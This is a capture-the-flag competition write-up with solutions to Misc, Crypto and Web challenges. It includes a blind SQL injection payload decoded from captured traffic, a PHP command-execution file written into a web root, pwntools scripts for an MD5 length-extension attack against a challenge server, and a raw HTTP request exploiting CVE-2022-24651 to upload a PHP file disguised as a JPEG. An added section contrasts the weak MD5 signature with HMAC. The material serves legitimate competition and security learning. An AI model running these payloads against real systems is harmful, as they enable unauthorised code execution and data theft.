Misc

1.sqlshark

Export all the HTTP packets from Wireshark as JSON, then write a script to filter them.

```python
import json

# res.json: Wireshark JSON export of the HTTP packets (request/response pairs alternate)
with open("res.json", "r", encoding="utf-8") as f:
    r = json.load(f)

PREFIX = "any'/**/or/**/(if(((((ord(substr((select(group_concat(password))from(users)) from "
MARKER = "if(((((ord(substr((select(group_concat(password))from(users)) from"

res = []
for i in range(0, len(r), 2):
    form = r[i]["_source"]["layers"]["urlencoded-form"]
    t = list(form.keys())[-1]
    # Keep only the requests whose response does not contain "correct"
    if "correct" not in list(r[i+1]["_source"]["layers"]["data-text-lines"].keys())[-1]:
        value = form[t]["urlencoded-form.value"].lower()
        if MARKER in value:
            # Reduce the payload to "<position>,<character code>"
            res.append(value.replace(PREFIX, "")
                       .replace("))),1,0))#", "").replace(" for 1))))in(", ","))

# The last field of each entry is the character code that was confirmed
for item in res:
    print(chr(int(item.split(",")[-1])), end="")
```

2.OnlyLocalSql

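Connect over SSH.

```bash
cd /var/www/html
# Quote the delimiter so the shell does not expand the backticks while writing the file
cat << 'EOF' >> flag.php
<?php echo `ls /f*`;
EOF
curl http://localhost:80
```

That's all it takes.

You could also add ssh -L to forward the port to your local machine, but there's no need.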

3.LearnOpenGL

I think my solution was unintended.

In the shaders package, remove spriteparticle and then open it; you can see it directly.

4.ez_msb

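249 => 11111001.

The data sits in the second bit. The main issue is MSB. I didn't really want to write an implementation in Python, so I just used GNU Radio Companion.

5.Survey

Next time I'll tick "very easy" again.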

Crypto

1.SignAhead

MD5 length extension attack.

hashpump wouldn't compile, so I found another tool.

```python
from pwn import *
import HashTools

context.log_level = 'info'
P = remote("manqiu.top", 20924)
for i in range(100):
    P.readline()
    # The server sends the message (hex) and its signature, one per line
    msg = bytes.fromhex(P.readline().decode().split(":")[1].strip())
    print("[*] msg:", msg)
    sign = P.readline().decode().split(":")[1].strip()
    print("[*] sign:", sign)
    md5 = HashTools.MD5()
    P.readline()
    # Secret length 32, append b"233" to the original message
    nmsg, nsign = md5.extension(32, msg, b"233", signature=sign)
    print("[*] nmsg:", nmsg.hex())
    print("[*] nsign:", nsign)
    P.sendlineafter(b": ", nmsg.hex().encode())
    P.sendlineafter(b": ", nsign.encode())
    print(P.readline())
print(P.recvline())
P.close()
```
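Why the attack above works, as an added example (not code from the original write-up or from the challenge): a tag computed as MD5(secret || msg) can be continued from the published digest without knowing the secret, while an HMAC tag cannot. SECRET, MSG and all helper names are constructed for illustration; 32 is the secret length the script above passes to HashTools.

```python
import hashlib, hmac, math, struct

S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
M32 = 0xFFFFFFFF

def md5_pad(total_len):
    """Padding MD5 appends to a message of total_len bytes."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack("<Q", total_len * 8)

def md5_compress(state, block):
    """One MD5 compression step over a 64-byte block (RFC 1321)."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + m[g]) & M32
        a, d, c = d, c, b
        b = (b + ((f << S[i] | f >> (32 - S[i])) & M32)) & M32
    return [(x + y) & M32 for x, y in zip(state, (a, b, c, d))]

def extend(tag_hex, msg, secret_len, suffix):
    """Continue hashing from a published tag; the secret itself is never used."""
    glue = md5_pad(secret_len + len(msg))      # padding the signer added implicitly
    state = list(struct.unpack("<4I", bytes.fromhex(tag_hex)))
    tail = suffix + md5_pad(secret_len + len(msg) + len(glue) + len(suffix))
    for i in range(0, len(tail), 64):
        state = md5_compress(state, tail[i:i + 64])
    return msg + glue + suffix, struct.pack("<4I", *state).hex()

def naive_tag(secret, msg):    # weak construction: MD5(secret || msg)
    return hashlib.md5(secret + msg).hexdigest()

def hmac_tag(secret, msg):     # fix: HMAC (prefer HMAC-SHA256 in new designs)
    return hmac.new(secret, msg, hashlib.md5).hexdigest()

SECRET = b"k" * 32             # constructed sample secret
MSG = b"user=guest"            # constructed sample message

def forgery_accepted(tag_fn):
    """True if a tag extended from tag_fn's output verifies under tag_fn."""
    new_msg, new_tag = extend(tag_fn(SECRET, MSG), MSG, len(SECRET), b"233")
    return hmac.compare_digest(new_tag, tag_fn(SECRET, new_msg))
```

`forgery_accepted(naive_tag)` is true and `forgery_accepted(hmac_tag)` is false: the outer keyed hash in HMAC means the published tag is not a reusable internal state.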

2.basiccry

Pass in a superincreasing/superdecreasing sequence, and you can directly recover the value of one row.

```python
from pwn import *

context.log_level = 'info'
P = remote("manqiu.top", 21175)

# Send the decreasing powers of two 2**255 ... 2**0 as a comma-separated list
r = ",".join(str(2**i) for i in range(255, -1, -1)).encode()
P.sendlineafter(b":", r)

# Read the 256 rows of 0/1 values
cc = []
for i in range(256):
    l = []
    v = (P.recvline().decode().strip('\n')).strip().strip('[]').split(' ')
    for _ in v:
        if _ == '1' or _ == '0':
            l.append(int(_))
    cc.append(l)

# Read the tuple of integers that follows
v = (P.recvline().decode().strip('\n')).strip('()').split(',')
v = [int(i) for i in v]
P.close()

# Greedy decomposition of v[0] over the powers of two gives one row's bits
d = v[0]
r = 2**255
ans = ""
while r != 0:
    if d >= r:
        d -= r
        ans += "1"
    else:
        ans += "0"
    r //= 2

# Remove that row from the first row modulo 2 and decode the bits as ASCII
cc = list(cc[0])
for i in range(len(cc)):
    cc[i] -= int(ans[i])
    cc[i] = cc[i] % 2
for i in range(0, len(cc), 8):
    print(chr(int("".join(map(str, cc[i:i+8])), 2)), end="")
```

Web

1.Checkin

Just press F12 and find the variable _0x3d9d in game.js.

2.TrySent

CVE-2022-24651

```
POST /user/upload/upload HTTP/1.1
Host: target.com
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

JFIF <?php RCE;?>
------WebKitFormBoundaryrhx2kYAMYDqoTThz--
```

3.codefever_again

https://github.com/PGYER/codefever/issues/140